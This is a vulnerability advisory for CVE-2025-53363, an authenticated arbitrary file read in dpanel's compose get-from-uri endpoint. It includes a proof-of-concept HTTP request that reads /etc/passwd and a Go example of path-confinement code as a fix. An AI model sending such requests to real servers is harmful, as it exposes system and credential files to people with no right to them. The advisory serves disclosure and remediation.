CVE-2025-53363 github.com/donknap/dpanel

Package

Manager: go
Name: github.com/donknap/dpanel
Vulnerable Version: >=1.2.0 <=1.7.2

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:P

EPSS: 0.00058 (percentile 0.18341)

Details

Dpanel has an arbitrary file read vulnerability

### Summary

Dpanel has an arbitrary file read vulnerability in the /api/app/compose/get-from-uri interface. Once logged in to Dpanel, this interface can be used to read arbitrary files.

### Details

When a user logs into the administrative backend, this interface can read any file on the host/server (given the necessary permissions), which may lead to system information leakage. The vulnerability lies in the GetFromUri function within the app/application/http/controller/compose.go file. The uri parameter submitted by the user in JSON format is passed directly to os.ReadFile and its contents returned, without proper security handling.

![image-20250702004157585](https://github.com/user-attachments/assets/1f0e683b-bf0b-49e6-8d68-833fcf3f214d)

![image-20250702004223184](https://github.com/user-attachments/assets/b5e89e02-f572-4edf-aaa8-566dea090d3f)

### PoC

```text
POST /api/app/compose/get-from-uri HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJ......lWg==
Connection: close
Content-Type: application/json
Content-Length: 21

{"uri":"/etc/passwd"}
```

### Impact

This vulnerability could lead to the leakage of sensitive server file information. In versions from 1.2.0 up to the latest (1.7.2), logged-in users can make requests to this interface.
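The confine-then-read pattern that a fix for this class of bug needs, shown as an added Go example rather than dpanel's own code: `resolveComposePath`, `readComposeFile` and the base directory `/data/compose` are assumed names and values, and the project's actual fix may differ. The base directory is assumed to be an absolute, canonical path.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// resolveComposePath confines a caller-supplied uri to baseDir (assumed absolute,
// e.g. /data/compose): the input is cleaned, then checked for containment, so "../"
// sequences and absolute paths such as /etc/passwd are rejected before any read.
func resolveComposePath(baseDir, uri string) (string, error) {
	if uri == "" || strings.ContainsRune(uri, 0) {
		return "", errors.New("empty or invalid uri")
	}
	candidate := filepath.Clean(uri)
	if !filepath.IsAbs(uri) {
		candidate = filepath.Join(baseDir, uri) // Join cleans, collapsing any ".."
	}
	rel, err := filepath.Rel(baseDir, candidate)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errors.New("uri resolves outside the compose directory")
	}
	return candidate, nil
}

// readComposeFile is the confine-then-read replacement for handing uri straight
// to os.ReadFile. baseDir is assumed canonical; the target is re-checked after
// symlink resolution so a link inside baseDir cannot redirect the read outside it.
func readComposeFile(baseDir, uri string) ([]byte, error) {
	path, err := resolveComposePath(baseDir, uri)
	if err != nil {
		return nil, err
	}
	target, err := filepath.EvalSymlinks(path)
	if err != nil {
		return nil, err
	}
	if _, err = resolveComposePath(baseDir, target); err != nil {
		return nil, err
	}
	return os.ReadFile(target)
}

func main() {
	p, err := resolveComposePath("/data/compose", "../../etc/passwd") // constructed input
	fmt.Println(p, err) // p is empty; err reports the traversal attempt
}
```

A rejected resolution is worth logging with the authenticated user and submitted uri, since a traversal attempt from a valid session is a useful detection signal.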

Metadata

Created: 2025-08-22T16:49:05Z
Modified: 2025-08-29T20:34:31Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-gcqf-pxgg-gw8q/GHSA-gcqf-pxgg-gw8q.json
CWE IDs: ["CWE-22", "CWE-73"]
Alternative ID: GHSA-gcqf-pxgg-gw8q
Finding: F063
Auto approve: 1